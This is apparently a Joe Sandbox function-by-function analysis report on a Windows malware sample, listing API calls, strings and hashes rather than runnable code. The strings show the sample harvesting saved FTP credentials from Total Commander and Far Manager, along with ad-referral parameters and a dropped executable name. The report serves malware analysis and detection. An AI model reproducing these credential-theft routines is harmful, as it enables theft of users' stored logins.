Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C

Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

GetSystemMetrics.USER32(00000000), ref: 004032E5
GetSystemMetrics.USER32(00000001), ref: 004032ED
VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
VirtualProtect.KERNEL32(75C50B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377

Strings

AtlAxAttachControl, xrefs: 0040335F
AtlAxWinInit, xrefs: 00403357
AtlAxGetControl, xrefs: 0040336C
atl, xrefs: 00403340

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
API String ID: 3066332896-2664446222
Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79

Function 00408248 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 116sleepfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Sleep.KERNEL32(00000000), ref: 00408342
Sleep.KERNEL32(00000000), ref: 00408377
FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
FindClose.KERNEL32(00000000), ref: 004083B9

Strings

.8@, xrefs: 0040833F
.8@, xrefs: 00408379
., xrefs: 004082CE
@@, xrefs: 0040825E
., xrefs: 004082B7

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID: .$.$.8@$.8@$@@
API String ID: 2348139788-3828113974
Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59

Function 0040350F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681

Strings

pass, xrefs: 00403611
user, xrefs: 00403601
ftp://%s:%s@%s:%u, xrefs: 004036C3
port, xrefs: 004035F1

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: ftp://%s:%s@%s:%u$pass$port$user
API String ID: 3432043379-2696999094
Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56

Function 00407036 Relevance: 16.6, APIs: 11, Instructions: 97filenetworkCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,74DF0F00), ref: 00407043
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
GetLastError.KERNEL32(00000000), ref: 00407079
SetEndOfFile.KERNEL32(00000000), ref: 0040708F
InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
CloseHandle.KERNEL32(00000000), ref: 004070BB

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
String ID:
API String ID: 3711279109-0
Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66

Function 00401C41 Relevance: 11.7, Strings: 9, Instructions: 462COMMON

Download Yara Rule

Strings

&ref=%s&real_refer=%s, xrefs: 00401DAE, 00401F12
&kwtype=, xrefs: 0040210A
0, xrefs: 0040214E
0, xrefs: 00401E62
&ref=%s, xrefs: 004021B8
0, xrefs: 00401C87
&real_refer=%s, xrefs: 00401DCB, 00401F2F
0, xrefs: 00402175
&condition_id=, xrefs: 004020AE

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID:
String ID: &condition_id=$&kwtype=$&real_refer=%s$&ref=%s$&ref=%s&real_refer=%s$0$0$0$0
API String ID: 0-2992689389
Opcode ID: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
Instruction ID: e592e17ffd072e5ed7288f56bd6294cd549ee2c695a1c784d027d9705cc039a8
Opcode Fuzzy Hash: f118b9fb71cfb78005f5506091eb1ec0394b7ad0f1bd3af93ebbb6a5fa6d69e0
Instruction Fuzzy Hash: B2F1E272810118AADB14EB61DC919EF737EEF01304F5044BBFA09B62D1E7789E858F99

Function 00407499 Relevance: 9.1, APIs: 6, Instructions: 62timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?), ref: 004074AD
GetLocalTime.KERNEL32(00000000), ref: 004074B3
GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
String ID:
API String ID: 3777474486-0
Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5

Function 00407267 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
__aulldiv.LIBCMT ref: 004072E3

Strings

c{@, xrefs: 004072D3

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Time$System$File$__aulldiv
String ID: c{@
API String ID: 3735792614-264719814
Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5

Function 0040CD66 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D0C4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
TerminateProcess.KERNEL32(00000000), ref: 0040D107

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

Function 0040A057 Relevance: 4.5, APIs: 3, Instructions: 40comCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
SetForegroundWindow.USER32(00000000), ref: 0040A088

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: ForegroundWindow$CreateInstance
String ID:
API String ID: 2498160819-0
Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25

Function 00406CB5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00406CCF

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95

Function 0040B51C Relevance: .7, Instructions: 666COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
GetLastError.KERNEL32(?), ref: 00402F4E
GetLastError.KERNEL32 ref: 00403237
GetLastError.KERNEL32(?), ref: 00403258

Strings

^client=, xrefs: 0040301A
8@, xrefs: 004031AC
8@, xrefs: 00402FBA
.html, xrefs: 00402FFE, 004031EE
none, xrefs: 00402F16
From: , xrefs: 004030C8
4@, xrefs: 00402EF1
Via: , xrefs: 004030ED
^key=, xrefs: 0040305E
file, xrefs: 0040300F

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
API String ID: 2247176544-2288798624
Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181
threadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3

Strings

begun.ru, xrefs: 0040B16A
\netprotdrvss.exe, xrefs: 0040B12D, 0040B293

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
String ID: \netprotdrvss.exe$begun.ru
API String ID: 2887986221-2660752650
Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84

Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF

PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF

Strings

installdir, xrefs: 00403DA1
$, xrefs: 00403CF9
&, xrefs: 00403D07
SOFTWARE\Ghisler\Total Commander, xrefs: 00403C2F
*totalcmd*, xrefs: 00403CB7
#, xrefs: 00403D0E
*total*commander*, xrefs: 00403CC9
ftpininame, xrefs: 00403C41
*ghisler*, xrefs: 00403CD8

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
API String ID: 2046068145-3914982127
Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004027F5

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Strings

From: true, xrefs: 00402827

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: Internet$InitializeOpenOption
String ID: From: true
API String ID: 1176259655-9585188
Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
RegCloseKey.ADVAPI32(?), ref: 0040442A

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

user, xrefs: 00404274
ftp://%s:%s@%s, xrefs: 004043B7
username, xrefs: 00404266
hostname, xrefs: 00404258
password, xrefs: 00404282
SOFTWARE\Far\Plugins\ftp\hosts, xrefs: 00404219
SOFTWARE\Far2\Plugins\ftp\hosts, xrefs: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd

Similarity

API ID: HeapOpen$AllocCloseEnumFree
String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
API String ID: 416369273-4007225339
Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69

Function 0040451B Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 205registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
